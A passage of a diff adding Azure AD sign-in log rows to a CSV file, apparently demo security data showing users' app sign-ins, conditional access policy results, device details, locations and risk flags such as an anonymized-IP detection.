10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",793d74e7-0f32-47f0-ad00-3e8cf0ab0700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,793d74e7-0f32-47f0-ad00-3e8cf0ab0700,SigninLogs,Sucess,33.0175209,35.44601059
+1373,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,80689f97-dedc-415e-b0f9-3ae80b05964b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b58c6208-3745-40bc-8745-ecaa252e0800,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b58c6208-3745-40bc-8745-ecaa252e0800,SigninLogs,Sucess,50.6406517,5.572050095
+1374,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,680d88ad-50cd-4ec4-9d9c-1431809b45cb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Windows Sign In,38aa3b87-a06d-4817-b275-7a316988d93b,Mobile Apps and Desktop clients,[],notApplied,08/04/2020 07:28,"{'operatingSystem': 'Windows', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3109113e-8f92-47c2-a124-24834cc80600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3109113e-8f92-47c2-a124-24834cc80600,SigninLogs,Sucess,50.6406517,5.572050095
+1375,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:49.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,971f0471-f879-4885-bdda-424823b9a62a,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f4c49c86-cb9e-4a04-9dcc-1dcd207f0500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f4c49c86-cb9e-4a04-9dcc-1dcd207f0500,SigninLogs,Sucess,50.6406517,5.572050095
+1376,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,788bc14e-f8a6-4f93-829f-c6c4475606c4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9303d935-cf24-489a-bd00-a11c5bcd0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c5bcd0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1377,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:07.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a052e7e-2284-4115-9ddd-003f29550700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5a052e7e-2284-4115-9ddd-003f29550700,SigninLogs,Sucess,50.6406517,5.572050095
+1378,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:46.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79faf53e-b14c-409e-aa83-a74dd0943d35,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e82050b8-a2c4-426d-8c05-8f1d0cc60700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e82050b8-a2c4-426d-8c05-8f1d0cc60700,SigninLogs,Sucess,50.6406517,5.572050095
+1379,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:23.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,504c2262-a8bd-41e3-b557-c74af5928bc0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3a3c86e-d6a1-4323-9bc0-1a269c710600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d3a3c86e-d6a1-4323-9bc0-1a269c710600,SigninLogs,Sucess,34.06555176,-118.2405396
+1380,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:30.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",34805c5b-6a36-487d-9189-7bc1f3db0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,34805c5b-6a36-487d-9189-7bc1f3db0500,SigninLogs,Sucess,34.06555176,-118.2405396
+1381,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f0b0e318-3997-4e0d-8f60-13e6da0333d1,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 